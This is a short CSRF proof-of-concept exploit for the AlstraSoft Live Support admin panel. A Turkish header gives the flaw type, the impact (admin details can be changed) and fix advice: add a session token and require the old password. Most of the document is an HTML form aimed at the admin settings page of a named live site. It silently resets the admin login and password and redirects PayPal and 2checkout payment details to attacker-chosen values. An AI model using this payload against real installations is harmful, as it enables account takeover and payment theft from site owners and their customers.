< ------------------- header data start ------------------- >

#############################################################

# Application Name :AlstraSoft Live Support

# vulnerable Type : xsrf

# Infection : Admin Bilgileri Degistirilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli,eski sifre sorulmalidir.

# author : BUG RESEARCHERS//CWH1RLPOOL

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >
<form action=http://www.blizsoft.com/live/admin/managesettings.php method=get

enctype=application/x-www-form-urlencoded>
<input class=DataFONT type=Text name=login maxlength=30 size=30 value=cwhirlpool>
<input class=DataFONT type=Text name=password maxlength=30 size=30 value=cwhirlpool>
<input class=DataFONT type=Text name=2checkoutID maxlength=30 size=30 value=250535>
<input class=DataFONT type=Text name=paypal_email maxlength=30 size=30

value=bugres@cwhirlpool>
<input class=DataFONT type=Text name=payment_amount maxlength=30 size=30 value=10>
<input onclick=javascript: document.all.requrring_period.disabled=1 type=Radio

name=payment_type value=once >
<input onclick=javascript: document.all.requrring_period.disabled=0 type=Radio

name=payment_type value=month checked>
<input class=DataFONT type=Text name=requrring_period maxlength=30 size=30 value=30 >
<input type=hidden value=update name=FormAction/>
<input class=child type=submit value=update onclick=document.Form.FormAction.value = ’update’;>
<input type=hidden name=FormName value=Form>
</form>
< -- bug code end of -- >